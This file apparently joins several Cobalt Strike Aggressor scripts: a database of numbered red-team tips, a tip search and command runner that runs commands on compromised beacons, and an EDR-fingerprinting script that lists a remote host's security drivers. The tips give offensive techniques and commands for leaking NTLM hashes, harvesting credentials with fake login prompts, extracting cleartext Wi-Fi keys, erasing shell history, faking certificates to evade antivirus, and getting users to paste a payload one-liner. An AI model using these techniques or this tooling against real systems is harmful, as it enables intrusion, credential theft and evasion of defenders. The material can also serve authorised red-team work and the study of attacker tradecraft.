%(tips => 'Red tip #168: Using VBS or JS? Cant stage using PowerShell.exe as blocked? @Cneelis released https://github.com/Cn33liz/StarFighters so you can keep use PS', tags => @(
'redtip', '#168', 'VBS', 'JS', 'powershell', 'stage', 'StarFighters'
)
),
%(tips => 'Red tip #169: Not sure who uses Wi-Fi webcams but go run a mass deauth attack if youre going to plan on breaking in physically to discon', tags => @(
'redtip', '#169', 'WiFi', 'webcam', 'deauth', 'physical'
)
),
%(tips => 'Red tip #170: @malcomvetter Never use defaults - run Mimikatz with AES and 8 hour tickets to avoid passive detection from NG defense tools!', tags => @(
'redtip', '#170', '', '', ''
)
),
%(tips => 'Red tip #171: Win XP doesnt have PowerShell? Try using Unmanaged powershell to keep using your favourite scripts!', tags => @(
'redtip', '#171', 'XP', 'powershell', 'unmanaged', 'scripts'
)
),
%(tips => 'Red tip #172: @anthonykasza tells us that the at.exe command takes base64 encoded Params! Eg. at.exe b64::[encoded params]', tags => @(
'redtip', '#172', 'at', 'command', 'base64', 'encoded'
)
),
%(tips => 'Red tip #173: Grab cleartext wireless keys: netsh wlan show profile name="ssid" key=clear', tags => @(
'redtip', '#173', 'wireless', 'netsh', 'wlan', 'ssid'
)
),
%(tips => 'Red tip #174: Got a shell on a victim without admin? Want their creds? Try Inveigh then rpcping -s 127.0.0.1 -t ncacn_np to leak hash.', tags => @(
'redtip', '#174', 'shell', 'admin', 'creds', 'Inveigh', 'rpcping'
)
),
%(tips => 'Red tip #175: Got a low priv shell and need creds? Use Invoke-LoginPrompt by @enigma0x3 https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1', tags => @(
'redtip', '#175', 'shell', 'creds', 'Login', 'Prompt'
)
),
%(tips => 'Red tip #176: Get access to shadow admin accounts, they can DCsync and are essentially DA. https://www.cyberark.com/threat-research-blog/shadow-admins-stealthy-accounts-fear/', tags => @(
'redtip', '#176', 'access', 'shadow', 'admin', 'accounts', 'dcsync', 'DA'
)
),
%(tips => 'Red tip #177: If blue detects PTH. Try extract Kerberos tickets and PTT.', tags => @(
'redtip', '#177', 'blue', 'PTH', 'kerberos', 'tickets', 'PTT'
)
),
%(tips => 'Red tip #178: @lefterispan wrote https://gist.github.com/leftp/a3330f13ac55f584239baa68a3bb88f2 … which sets up a proxy and forces an auth attempt to it to leak hash. Low priv leak.', tags => @(
'redtip', '#178', 'proxy', 'auth', 'hash'
)
),
%(tips => 'Red tip #179: When creating phishing pages, try cloning and modifying parts of the client’s own webpages. For example of their VPN login!', tags => @(
'redtip', '#179', 'phish', 'cloning', 'webpage', 'VPN', 'login'
)
),
%(tips => 'Red tip #180: Regardless of whether there are known defenses. Run your PS scripts through Obfuscation before loading into memory.', tags => @(
'redtip', '#180', 'defenses', 'powershell', 'scripts', 'Obfuscation', 'memory'
)
),
%(tips => 'Red tip #181: Stuck trying to find those assets still? Try @424f424f Get-BrowserData https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Get-BrowserData.ps1', tags => @(
'redtip', '#181', 'assets', 'Browser', 'data', 'powershell'
)
),
%(tips => 'Red tip #182: Follow @JohnLaTwC as he tweets phishing examples and sometimes with new techniques used in Wild. Good for adversary simulation', tags => @(
'redtip', '#182', 'phishing', 'adversary', 'simulation'
)
),
%(tips => 'Red tip #183: @MrUn1k0d3r released https://github.com/Mr-Un1k0d3r/SCT-obfuscator … can probably bypass Gateway signatures when performing SCT delivery for regsvr32! https://github.com/Mr-Un1k0d3r/SCT-obfuscator', tags => @(
'redtip', '#183', 'SCT', 'bypass', 'delivery', 'regsvr32'
)
),
%(tips => 'Red tip #184: We always talk about Windows and AD. But now let’s have a look at Linux and AD with https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9', tags => @(
'redtip', '#184', 'windows', 'AD', 'linux'
)
),
%(tips => 'Red tip #185: Use WSUS for lateral movement https://github.com/AlsidOfficial/WSUSpendu/blob/master/WSUSpendu.ps1', tags => @(
'redtip', '#185', 'WSUS', 'lateral movement', 'pivot'
)
),
%(tips => 'Red tip #186: View @jpcert https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf … and look at all those indicators and artifacts left behind. Then hexedit those tools :+1:', tags => @(
'redtip', '#186', 'artifacts', 'research', 'hexedit'
)
),
%(tips => 'Red tip #187: Found a portal using 2FA? Using RSA SecureID? https://blog.netspi.com/targeting-rsa-emergency-access-tokencodes-fun-profit/ … Pin bruteforce!', tags => @(
'redtip', '#187', 'portal', 'web', 'secureID'
)
),
%(tips => 'Red tip #188: @pwnagelabs says to avoid bash history on exit using: kill -9 $$', tags => @(
'redtip', '#188', 'bash', 'history', 'kill'
)
),
%(tips => 'Red tip #189: @pwnagelabs teaches us how to avoid wtmp logging with: ssh -l user target -T', tags => @(
'redtip', '#189', 'wtmp', 'logging', 'ssh'
)
),
%(tips => 'Red tip #190: @bluscreenofjeff shows us how to use Apache Mod rewrite to randomly serve different payloads https://bluescreenofjeff.com/2017-06-13-serving-random-payloads-with-apache-mod_rewrite/', tags => @(
'redtip', '#190', 'Apache', 'payload', 'rewrite', 'jeff'
)
),
%(tips => 'Red tip #191: Domain user? Query LDAP for Printers. Attempt default creds or known vulns then read Service account creds, hash or relay', tags => @(
'redtip', '#191', 'domain', 'LDAP', 'Printers', 'creds', 'vulns', 'account', 'hash'
)
),
%(tips => 'Red tip #192: Get-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-CSV -not dns.csv', tags => @(
'redtip', '#192', 'gmwi', 'wmi', 'DNS', 'csv'
)
),
%(tips => 'Red tip #193: Password protected doc in email? For some reason a lot of people send the password separately to the same inbox. #epicfail', tags => @(
'redtip', '#193', 'password', 'doc', 'email', 'inbox'
)
),
%(tips => 'Red tip #194: Can’t see another part of the network and there’s a DC? Pivot off the DC :)', tags => @(
'redtip', '#194', 'network', 'DC', 'pivot'
)
),
%(tips => 'Red tip #195: C:\windows\system32\inetsrv\appcmd list site to find IIS bindings.', tags => @(
'redtip', '#195', 'appcmd', 'IIS'
)
),
%(tips => 'Red tip #196: DA -> Locate DB -> Found MSSQL? https://github.com/NetSPI/PowerUpSQL use PowerUpSQL to enumerate and privesc by stealing tokens.', tags => @(
'redtip', '#196', 'DA', 'DB', 'MSSQL', 'PowerUpSQL', 'enumerate', 'privesc'
)
),
%(tips => 'Red tip #197: If ACL doesn’t let you read other users’ home shares, you can try net view \fileserv /all to try other shares and folders!', tags => @(
'redtip', '#197', 'ACL', 'shares', 'net', 'view', 'folders'
)
),
%(tips => 'Red tip #198: Username jondoe and jondoe-x? Ones an Admin? Try same password. May be shared :sunglasses: repeat for entire user list.', tags => @(
'redtip', '#198', 'username', 'Admin', 'password', 'shared', 'list'
)
),
%(tips => 'Red tip #199: Failed to phish? Payloads failing? Mac users? Write an email and ask them to open terminal and paste in python Empyre one line', tags => @(
'redtip', '#199', 'phish', 'payload', 'mac', 'users', 'email', 'python', 'Empyre'
)
),
%(tips => 'Red tip #200: @_wald0 blessed us with this BH cypher query to skip specific nodes to look for other paths. https://pastebin.com/qAzH9uji', tags => @(
'redtip', '#200', 'BH', 'cypher', 'nodes'
)
),
%(tips => 'Red tip #201: @424f424f pushed some research into LNK files inside CAB can be used to bypass the Attachment Manager :+1:http://www.rvrsh3ll.net/blog/informational/bypassing-windows-attachment-manager/', tags => @(
'redtip', '#201', 'research', 'LNK', 'CAB', 'bypass'
)
),
%(tips => 'Red tip #202: When domain fronting, your calls hit the edge node, so every domain you use potentially hits a different a IP! :sunglasses:', tags => @(
'redtip', '#202', 'domain', 'fronting', 'IP', 'node'
)
),
%(tips => 'Red tip #203: If using @Cneelis StarFighter. Instead of using a staged web delivery, just stick while stageless payload as encoded block in!', tags => @(
'redtip', '#203', 'StarFighter', 'web', 'delivery', 'payload', 'encoded'
)
),
%(tips => 'Red tip #204: Printers are often good MAC addresses to use to beat NAC when physical red teaming as printers (mostly?) don’t support 802.1x', tags => @(
'redtip', '#204', 'Printers', 'MAC', 'addresses', '802.1x'
)
),
%(tips => 'Red tip #205: If proxy is blocking SCT file, replace with and add around the rest. Thx @subTee', tags => @(
'redtip', '#205', 'proxy', 'SCT', 'file'
)
),
%(tips => 'Red tip #206: CobaltStrike VNC not working? Here is a workaround using @artkond Invoke-VNC https://github.com/vysec/Aggressor-VYSEC/blob/master/vnc-psh.cna', tags => @(
'redtip', '#206', 'cobaltstrike', 'VNC', 'Invoke-VNC'
)
),
%(tips => 'Red tip #207: Got C2 on Windows user but no credentials? Leak a hash using @leftp code. Implemented into CNA https://github.com/vysec/Aggressor-VYSEC/blob/master/Invoke-CredLeak.ps1', tags => @(
'redtip', '#207', 'C2', 'windows', 'user', 'credentials', 'hash'
)
),
%(tips => 'Red tip #208: @Nebulator spoke on IP regex by IR at #SnoopCon. @armitagehacker CNA to automate https://github.com/vysec/Aggressor-VYSEC/blob/master/ping.cna', tags => @(
'redtip', '#208', 'IP', 'regex', 'IR', 'ping', 'cna'
)
),
%(tips => 'Red tip #209: Automate environment prepping and spawn all processes as a child of explorer.exe by @armitagehacker https://github.com/vysec/Aggressor-VYSEC/blob/master/auto-prepenv.cna', tags => @(
'redtip', '#209', 'automate', 'environment', 'processes', 'explorer.exe'
)
),
%(tips => 'Red tip #210: @subTee highlighted to us that XML requests can be used as a download cradle in constrained language mode!', tags => @(
'redtip', '#210', 'XML', 'download', 'cradle', 'language'
)
),
%(tips => 'Red tip #211: Check out @armitagehacker post on OPSEC considerations when using a CobaltStrike beacon. https://blog.cobaltstrike.com/2017/06/23/opsec-considerations-for-beacon-commands/', tags => @(
'redtip', '#211', 'cobaltstrike', 'beacon', 'opsec'
)
),
%(tips => 'Red tip #212: Reset AD passwords from Linux with @mubix https://room362.com/post/2017/reset-ad-user-password-with-linux/ :) proxychains it over your pivot :D', tags => @(
'redtip', '#212', 'AD', 'password', 'linux', 'proxychains', 'pivot'
)
),
%(tips => 'Red tip #213: Got a NetNTLMv1 hash? Convert it to NTLM by cracking three DES keys: https://hashcat.net/forum/thread-5912.html', tags => @(
'redtip', '#213', 'NTLM', 'hash', 'cracking', 'DES'
)
),
%(tips => 'Red tip #214: If you don’t 100 percent understand NETNTLMv1 and v2 read up on https://blog.smallsec.ca/2016/11/21/ntlm-challenge-response/', tags => @(
'redtip', '#214', 'NTLM', 'NTLMv2', 'blog', 'hashing'
)
),
%(tips => 'Red tip #215: If you don’t know how LM and NTLM hashing works... go back to basics with https://blog.smallsec.ca/2016/11/07/windows-credentials/', tags => @(
'redtip', '#215', 'LM', 'NTLM', 'hashing', 'windows', 'credentials'
)
),
%(tips => 'Red tip #216: @424f424f just made me aware that FireEye can prevent runas from executing. Use unmanaged PS to spawn https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1', tags => @(
'redtip', '#216', 'FireEye', 'runas', 'unmanaged', 'powershell'
)
),
%(tips => 'Red tip #217: S4U can be used to delegate across SPN. So if you have msds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFS', tags => @(
'redtip', '#217', 'S4U', 'SPN', 'HTTP', 'host', 'CIFS'
)
),
%(tips => 'Red tip #218: You’re in a subnet where people RDP into but you can’t attack outwards? Set backdoor over tsclient on start keys. :sunglasses:', tags => @(
'redtip', '#218', 'subnet', 'RDP', 'backdoor', 'tsclient'
)
),
%(tips => 'Red tip #219: Unsure what the localised admin account might be called or need to copy and paste? Check out https://social.technet.microsoft.com/wiki/contents/articles/13813.localized-names-for-administrator-account-in-windows.aspx', tags => @(
'redtip', '#219', 'admin', 'account', 'windows', 'copy', 'paste'
)
),
%(tips => 'Red tip #220: EDR monitoring “whoami”? Use echo %userprofile%; echo %username%. Or replace echo with anything that reflects error: ie. set', tags => @(
'redtip', '#220', 'EDR', 'whoami', 'echo', 'environment variables', 'set'
)
),
%(tips => 'Red tip #221: Network segregation in play? Try Get-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)', tags => @(
'redtip', '#221', 'Network', 'segregation', 'Netsite', 'PowerView', 'AD'
)
),
%(tips => 'Red tip #222: If you want to simulate MBR activity like #Petya, check out https://github.com/PowerShellMafia/PowerSploit/blob/master/Mayhem/Mayhem.psm1', tags => @(
'redtip', '#222', 'MBR', 'Petya', 'Mayhem', 'activity'
)
),
%(tips => 'Red tip #223: Secure your beach heads against #Petya WMIC /node:host process call create “echo > C:\windows\perfc”', tags => @(
'redtip', '#223', 'wmic', 'Petya', 'host', 'process', 'echo'
)
),
%(tips => 'Red tip #224: Using Linux? Modify /etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.', tags => @(
'redtip', '#224', 'linux', 'dhcp', 'opsec', 'VPN', 'site'
)
),
%(tips => 'Red tip #225: Stuck in a heavily segregated situation on a server? Try RDPInception attack vector out https://www.mdsec.co.uk/2017/06/rdpinception/', tags => @(
'redtip', '#225', 'segregated', 'server', 'RDP',
)
),
%(tips => 'Red tip #226: Reduce AV detection by using fake Microsoft certificate.', tags => @(
'redtip', '#226', 'AV', 'microsoft', 'certificate', 'detection'
)
),
%(tips => 'Red tip #227: Not using notifications yet for C2 events? For @armitagehacker Cobalt Strike check out', tags => @(
'redtip', '#227', 'notifications', 'C2', 'events', 'CobaltStrike'
)
),
%(tips => 'Red tip #228: Need a fully fledged phishing framework? Check out the amazing Fierce Phish by @Raikiasec <3 https://github.com/Raikia/FiercePhish', tags => @(
'redtip', '#228', 'phishing', 'framework', 'FiercePhish', 'King', 'Raikiasec'
)
),
);
sub get_database {
return @database;
return @tips;
}
# csfm.cna
# Your friendly red team operator's guide to the galaxy
#
# 001SPARTaN and r3dQu1nn
global('@database @results @customs');
@customs = @(); # Any custom definitions
sub search {
local('$index $arg %entry @tags @lctags');
clear(@results); # Make sure no leftovers from a previous search
$arg = $1;
println("Searching for $arg");
$index = 1;
# Iterate through all entries in the database
foreach %entry (@database) {
@tags = %entry["tags"];
# Super stupid way of doing this, but we want all our tags to be lowercase to allow proper matching
foreach $tag (@tags) {
add(@lctags, lc($tag), -1);
}
# If search term is empty or *, return all entries
if (($1 eq $null) || ($1 eq '*')) {
%entry["index"] = $index;
add(@results, %entry, -1);
$index++;
}
# Otherwise lowercase search term and search for it in tags
else if (lc($arg) in @lctags) {
println("Found result: " . %entry);
%entry["index"] = $index;
add(@results, %entry, -1);
$index++;
}
# Also do partial command match
else if (lc(%entry["cmd"]) ismatch ('.*?' . lc($arg) . '.*?')) {
println("Found result (cmd match): " . %entry);
%entry["index"] = $index;
add(@results, %entry, -1);
$index++;
}
clear(@lctags);
}
}
# Same search function as before, but only looks for tips
sub tip {
local('$index $arg %entry @tags @lctags');
clear(@results);
$arg = $1;
println("Searching for $arg");
$index = 1;
foreach %entry (@tips) {
@tags = %entry["tags"];
# Super stupid way of doing this, but we want all our tags to be lowercase to allow proper matching
foreach $tag (@tags) {
add(@lctags, lc($tag), -1);
}
if (($1 eq $null) || ($1 eq '*')) {
%entry["index"] = $index;
add(@results, %entry, -1);
$index++;
}
else if (lc($arg) in @lctags) {
println("Found result: " . %entry);
%entry["index"] = $index;
add(@results, %entry, -1);
$index++;
}
else if (lc(%entry["tips"]) ismatch ('.*?' . lc($arg) . '.*?')) {
println("Found result (cmd match): " . %entry);
%entry["index"] = $index;
add(@results, %entry, -1);
$index++;
}
clear(@lctags);
}
}
# Reload definitions from defs.cna and defs.bin
sub reload_defs {
local('%entry $handle');
@database = get_database();
# defs.bin contains an array of custom definitions stored as a serialized object
# Maybe not safe, but a malicious defs.bin is not our threat model here
$handle = openf("defs.bin");
@customs = readObject($handle);
closef($handle);
if (size(@customs) > 0) {
foreach %entry (@customs) {
add(@database, %entry, -1);
}
}
else {
@customs = @();
}
}
# Add a custom definition to defs.bin
sub add_def {
local('%entry $handle');
%entry["cmd"] = $3["cmd"];
%entry["desc"] = $3["desc"];
%entry["tags"] = split(',', $3["tags"]);
println("Adding " . %entry);
$handle = openf(">defs.bin"); # open handle to defs.bin
add(@customs, %entry, -1); # add entry to @customs array
writeObject($handle, @customs); # write @customs array to defs.bin handle
closef($handle); # close handle
reload_defs();
}
beacon_command_register("csfm", "The Red Team Operator's Guide to the Galaxy",
"\nSyntax: csfm [List]\n" .
"List all the options to use csfm\n" .
"\nQueries a database for well known commands, or diplays great tips or tricks for a Red Team Operator.\n" .
"Your friendly Red Team Operator Guide to the Galaxy by 001SPARTaN and r3dQu1nn!\n" .
"\nExample: search computer, tip ntlm\n"
);
alias csfm {
$arg = lc($2);
if ($arg ismatch 'list') {
local('$out');
$out = "csfm Command Options\n";
$out .= " \c0===============\n\n";
$out .= " Option Description\n";
$out .= "\c0 ------ -----------\n";
blog($1, $out);
blog2($1, "\cBsearch [option] Search the database for common commands, and tips");
blog2($1, "\cBtip [option] Display Red Team Tips");
blog2($1, "\cBruncmd [number] Run a command number returned by search");
blog2($1, "\cBadd [Enter] Dialog menu to add a command to the database");
}
if ($2 ismatch 'smile') {
local('$smile');
$smile = "\n";
blog($1, $smile);
}
if ($2 is $null) {
berror($1, "\c4Need to specify additional syntax! Use the 'list' command for help");
blog($1, "\cBSyntax Example: csfm list");
}
}
alias search {
local('%entry $index $cmd $desc');
# TODO: Allow search to narrow results by specifying multiple tags (space separated)
# if multiple args, pass array to search
# if search has multiple args, make sure to match each arg, not just first
search($2);
$size = size(@results);
blog($1, "Found $size results:");
foreach %entry (@results) {
$index = %entry["index"];
$cmd = %entry["cmd"];
$desc = %entry["desc"];
blog($1, "$index - $cmd\t$desc");
}
}
alias tip {
local ('%entry $index $tip $desc');
tip($2);
$size = size(@results);
blog($1, "Found $size results:");
foreach %entry (@results) {
$index = %entry["index"];
$tip = %entry["tips"];
blog($1, "$index - $tip");
}
}
alias runcmd {
local('%entry $index $bid');
$index = $2;
$bid = $1;
println($bid);
foreach %entry (@results) {
if (%entry["index"] eq $index) {
if ("powershell" in %entry["tags"]) {
prompt_text("Run command:", %entry["cmd"], lambda ({ bpowershell($bid, $1 . $+); }, $bid => $bid));
}
else {
prompt_text("Run command:", %entry["cmd"], lambda ({ bshell($bid, $1 . $+); }, $bid => $bid));
}
}
}
}
alias add {
$dialog = dialog("Add entry", %(cmd => "Command here", desc => "Description here", tags => "Tags here (comma separated)"), &add_def);
drow_text($dialog, "cmd", "Command: ");
drow_text($dialog, "desc", "Description: ");
drow_text($dialog, "tags", "Tags: ");
dbutton_action($dialog, "Add");
dialog_show($dialog);
}
reload_defs();
#EDR.cna
#Author: @r3dqu1nn
#Remotely query a system for EDR products
@edr = @("CiscoAMPCEFWDriver.sys", "CiscoAMPHeurDriver.sys", "cbstream.sys", "cbk7.sys", "Parity.sys", "libwamf.sys", "LRAgentMF.sys", "BrCow_x_x_x_x.sys", "brfilter.sys", "BDSandBox.sys", "TRUFOS.SYS", "AVC3.SYS", "Atc.sys", "AVCKF.SYS", "bddevflt.sys", "gzflt.sys", "bdsvm.sys", "hbflt.sys", "cve.sys", "psepfilter.sys", "cposfw.sys", "dsfa.sys", "medlpflt.sys", "epregflt.sys", "TmFileEncDmk.sys", "tmevtmgr.sys", "TmEsFlt.sys", "fileflt.sys", "SakMFile.sys", "SakFile.sys", "AcDriver.sys", "TMUMH.sys", "hfileflt.sys", "TMUMS.sys", "MfeEEFF.sys", "mfprom.sys", "hdlpflt.sys", "swin.sys", "mfehidk.sys", "mfencoas.sys", "epdrv.sys", "carbonblackk.sys", "csacentr.sys", "csaenh.sys", "csareg.sys", "csascr.sys", "csaav.sys", "csaam.sys", "esensor.sys", "fsgk.sys", "fsatp.sys", "fshs.sys", "eaw.sys", "im.sys", "csagent.sys", "rvsavd.sys", "dgdmk.sys", "atrsdfw.sys", "mbamwatchdog.sys", "edevmon.sys", "SentinelMonitor.sys", "edrsensor.sys", "ehdrv.sys", "HexisFSMonitor.sys", "CyOptics.sys", "CarbonBlackK.sys", "CyProtectDrv32.sys", "CyProtectDrv64.sys", "CRExecPrev.sys", "ssfmonm.sys", "CybKernelTracker.sys", "SAVOnAccess.sys", "savonaccess.sys", "sld.sys", "aswSP.sys", "FeKern.sys", "klifks.sys", "klifaa.sys", "Klifsm.sys", "mfeaskm.sys", "mfencfilter.sys", "WFP_MRT.sys", "groundling32.sys", "SAFE-Agent.sys", "groundling64.sys", "avgtpx86.sys", "avgtpx64.sys", "pgpwdefs.sys", "GEProtection.sys", "diflt.sys", "sysMon.sys", "ssrfsf.sys", "emxdrv2.sys", "reghook.sys", "spbbcdrv.sys", "bhdrvx86.sys", "bhdrvx64.sys", "SISIPSFileFilter.sys", "symevent.sys", "VirtualAgent.sys", "vxfsrep.sys", "VirtFile.sys", "SymAFR.sys", "symefasi.sys", "symefa.sys", "symefa64.sys", "SymHsm.sys", "evmf.sys", "GEFCMP.sys", "VFSEnc.sys", "pgpfs.sys", "fencry.sys", "symrg.sys", "cfrmd.sys", "cmdccav.sys", "cmdguard.sys", "CmdMnEfs.sys", "MyDLPMF.sys", "PSINPROC.SYS", "PSINFILE.SYS", "amfsm.sys", "amm8660.sys", "amm6460.sys");
#edr_query Command Register
beacon_command_register("edr_query", "Queries the remote or local system for all major EDR products installed",
"Syntax: edr_query [hostname] [arch]\n" .
"Checks the local or remote system for installed EDR products. **Note: Use localhost for [hostname] to query the local system**");
#edr_query alias
alias edr_query {
$bid = $1;
if ($2 is $null) {
blog($bid, "\c4Please enter a remote hostname or localhost!");
show_message("Please enter a remote hostname or localhost!");
}
else if ($3 is $null) {
blog($bid, "\c4Please enter a valid architechture!");
show_message("Please enter a valid architechture!");
}
else if ($3 ismatch 'x64') {
blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
bls($bid, "\\\\". $2 ."\\C\$\\windows\\system32\\drivers", &list);
}
else if ($3 ismatch 'x86') {
blog($bid, "\cBDetermining what EDR products are installed on ". $2 ."...");
bls($bid, "\\\\". $2 ."\\C\$\\windows\\sysnative\\drivers", &list);
}
}
sub query {
$bid = $1;
$dialog = dialog("EDR Query Menu", %(hostname => "Enter Remote HostName", Arch => ""), &EDR);
dialog_description($dialog, "EDR Query Menu. Remotely query a system for EDR products. Hostname field (IP or Hostname) is Mandatory! **Note: Use localhost for the local system.**");
drow_text($dialog, "hostname", "Target HostName:");
drow_combobox($dialog, "Arch", "Target Architechture:", @("x86", "x64"));
dbutton_action($dialog, "Execute");
dialog_show($dialog);
}
sub EDR {
if ($3['hostname'] ismatch 'Enter Remote HostName') {
show_message("Please enter a remote hostname or localhost!");
blog($bid, "\c4Please enter a remote hostname or localhost!");
}
else if ($3['Arch'] ismatch 'x86') {
bls($bid, "\\\\". $3['hostname'] ."\\C\$\\windows\\sysnative\\drivers", &list);
blog($bid, "\cBDetermining what EDR products are installed on ". $3['hostname']. "...");
}
else if ($3['Arch'] ismatch 'x64') {
bls($bid, "\\\\". $3['hostname'] ."\\C\$\\windows\\system32\\drivers", &list);
blog($bid, "\cBDetermining what EDR products are installed on ". $3['hostname']. "...");
}
}
#Parse dem results
sub list {
local('$entry $type $size $modified $name $out');
@results = split("\n", ["$3" trim]);
@matches = @();
foreach $entry (@results) {
($type, $size, $modified, $name) = split("\t", $entry);
if ($name in @edr) {
blog($bid, "\cB$name Found");
add(@matches, $name, 0);
}
}
$size = size(@matches);
$out .= "\c4$size EDR Products Found!\n";
$out .= " \c0======================\n";
$out .= " | Vendor Information | \n";
$out .= "\c0 ----------------------";
if (size(@matches) == 0) {
blog($bid, "\c9No EDR products found! Operate at your own risk!");
clear(@matches);
}
if (size(@matches) > 0) {
blog($bid, $out);
}
if ('FeKern.sys' in @matches || 'WFP_MRT.sys' in @matches) {
blog($bid, "FireEye Found!");
}
if ('eaw.sys' in @matches) {
blog($bid, "Raytheon Cyber Solutions Found!");
}
if ('rvsavd.sys' in @matches) {
blog($bid, "CJSC Returnil Software Found!");
}
if ('dgdmk.sys' in @matches) {
blog($bid, "Verdasys Inc. Found!");
}
if ('atrsdfw.sys' in @matches) {
blog($bid, "Altiris (Symantec) Found!");
}
if ('mbamwatchdog.sys' in @matches) {
blog($bid, "Malwarebytes Found!");
}
if ('edevmon.sys' in @matches || 'ehdrv.sys' in @matches) {
blog($bid, "ESET Found!");
}
if ('SentinelMonitor.sys' in @matches) {
blog($bid, "SentinelOne Found!");
}
if ('edrsensor.sys' in @matches || 'hbflt.sys' in @matches || 'bdsvm.sys' in @matches || 'gzflt.sys' in @matches || 'bddevflt.sys' in @matches || 'AVCKF.SYS' in @matches || 'Atc.sys' in @matches || 'AVC3.SYS' in @matches || 'TRUFOS.SYS' in @matches || 'BDSandBox.sys' in @matches) {
blog($bid, "BitDefender Found!");
}
if ('HexisFSMonitor.sys' in @matches) {
blog($bid, "Hexis Cyber Solutions Found!");
}
if ('CyOptics.sys' in @matches || 'CyProtectDrv32.sys' in @matches || 'CyProtectDrv64.sys' in @matches) {
blog($bid, "Cylance Inc. Found!");
}
if ('aswSP.sys' in @matches) {
blog($bid, "Avast Found!");
}
if ('mfeaskm.sys' in @matches || 'mfencfilter.sys' in @matches || 'epdrv.sys' in @matches || 'mfencoas.sys' in @matches || 'mfehidk.sys' in @matches || 'swin.sys' in @matches || 'hdlpflt.sys' in @matches || 'mfprom.sys' in @matches || 'MfeEEFF.sys' in @matches) {
blog($bid, "McAfee Found!");
}
if ('groundling32.sys' in @matches || 'groundling64.sys' in @matches) {
blog($bid, "Dell Secureworks Found!");
}
if ('avgtpx86.sys' in @matches || 'avgtpx64.sys' in @matches) {
blog($bid, "AVG Technologies Found!");
}
if ('pgpwdefs.sys' in @matches || 'GEProtection.sys' in @matches || 'diflt.sys' in @matches || 'sysMon.sys' in @matches || 'ssrfsf.sys' in @matches || 'emxdrv2.sys' in @matches || 'reghook.sys' in @matches || 'spbbcdrv.sys' in @matches || 'bhdrvx86.sys' in @matches || 'bhdrvx64.sys' in @matches || 'SISIPSFileFilter.sys' in @matches || 'symevent.sys' in @matches || 'vxfsrep.sys' in @matches || 'VirtFile.sys' in @matches || 'SymAFR.sys' in @matches || 'symefasi.sys' in @matches || 'symefa.sys' in @matches || 'symefa64.sys' in @matches || 'SymHsm.sys' in @matches || 'evmf.sys' in @matches || 'GEFCMP.sys' in @matches || 'VFSEnc.sys' in @matches || 'pgpfs.sys' in @matches || 'fencry.sys' in @matches || 'symrg.sys' in @matches) {
blog($bid, "Symantec Found!");
}
if ('SAFE-Agent.sys' in @matches) {
blog($bid, "SAFE-Cyberdefense Found!");
}
if ('CybKernelTracker.sys' in @matches) {
blog($bid, "CyberArk Software Found!");
}
if ('klifks.sys' in @matches || 'klifaa.sys' in @matches || 'Klifsm.sys' in @matches) {
blog($bid, "Kaspersky Found!");
}
if ('SAVOnAccess.sys' in @matches || 'savonaccess.sys' in @matches || 'sld.sys' in @matches) {
blog($bid, "Sophos Found!");
}
if ('ssfmonm.sys' in @matches) {
blog($bid, "Webroot Software, Inc. Found!");
}
if ('CarbonBlackK.sys' in @matches || 'carbonblackk.sys' in @matches || "Parity.sys" in @matches || "cbk7.sys" in @matches || "cbstream.sys" in @matches) {
blog($bid, "Carbon Black Found!");
}
if ('CRExecPrev.sys' in @matches) {
blog($bid, "Cybereason Found!");
}
if ('im.sys' in @matches || 'CSAgent.sys' in @matches || 'CSBoot.sys' in @matches || 'CSDeviceControl.sys' in @matches || 'cspcm2.sys' in @matches) {
blog($bid, "CrowdStrike Found!");
}
if ('cfrmd.sys' in @matches || 'cmdccav.sys' in @matches || 'cmdguard.sys' in @matches || 'CmdMnEfs.sys' in @matches || 'MyDLPMF.sys' in @matches) {
blog($bid, "Comodo Security Solutions Found!");
}
if ('PSINPROC.SYS' in @matches || 'PSINFILE.SYS' in @matches || 'amfsm.sys' in @matches || 'amm8660.sys' in @matches || 'amm6460.sys' in @matches) {
blog($bid, "Panda Security Found!");
}
if ('fsgk.sys' in @matches || 'fsatp.sys' in @matches || 'fshs.sys' in @matches) {
blog($bid, "F-Secure Found!");
}
if ('esensor.sys' in @matches) {
blog($bid, "Endgame Found!");
}
if ('csacentr.sys' in @matches || 'csaenh.sys' in @matches || 'csareg.sys' in @matches || 'csascr.sys' in @matches || 'csaav.sys' in @matches || 'csaam.sys' in @matches) {
blog($bid, "Cisco Found!");
}
if ('TMUMS.sys' in @matches || 'hfileflt.sys' in @matches || 'TMUMH.sys' in @matches || 'AcDriver.sys' in @matches || 'SakFile.sys' in @matches || 'SakMFile.sys' in @matches || 'fileflt.sys' in @matches || 'TmEsFlt.sys' in @matches || 'tmevtmgr.sys' in @matches || 'TmFileEncDmk.sys' in @matches) {
blog($bid, "Trend Micro Inc Found!");
}
if ('epregflt.sys' in @matches || 'medlpflt.sys' in @matches || 'dsfa.sys' in @matches || 'cposfw.sys' in @matches) {
blog($bid, "Check Point Software Technologies Found!");
}
if ('psepfilter.sys' in @matches || 'cve.sys' in @matches) {
blog($bid, "Absolute Found!");
}
if ('brfilter.sys' in @matches || 'BrCow_x_x_x_x.sys' in @matches) {
blog($bid, "Bromium Found!");
}
if ('LRAgentMF.sys' in @matches) {
blog($bid, "LogRhythm Found!");
}
if ('libwamf.sys' in @matches) {
blog($bid, "OPSWAT Inc Found!");
}
}
popup beacon_bottom {
item "EDR Query" {
query($1);
}
}
#
# Color Coded Files Listing.
#
# A nice script that colorizes your `ls` output and keeps track of uploaded files
# to let you highlight them.
#
# Be wary of additional performance hit when listing big directories imposed by
# their listing processing, coloring and sorting that this script does.
#
# Based on the original ProcessColor.cna idea by @r3dQu1nn.
#
# Author:
# Mariusz B. / mgeeky, '20
# <mb [at] binary-offensive.com>
# (https://github.com/mgeeky)
#
global('@UPLOADED_FILE_NAMES $TIMES_TO_DISPLAY_COLORS_SCHEME');
@UPLOADED_FILE_NAMES = @();
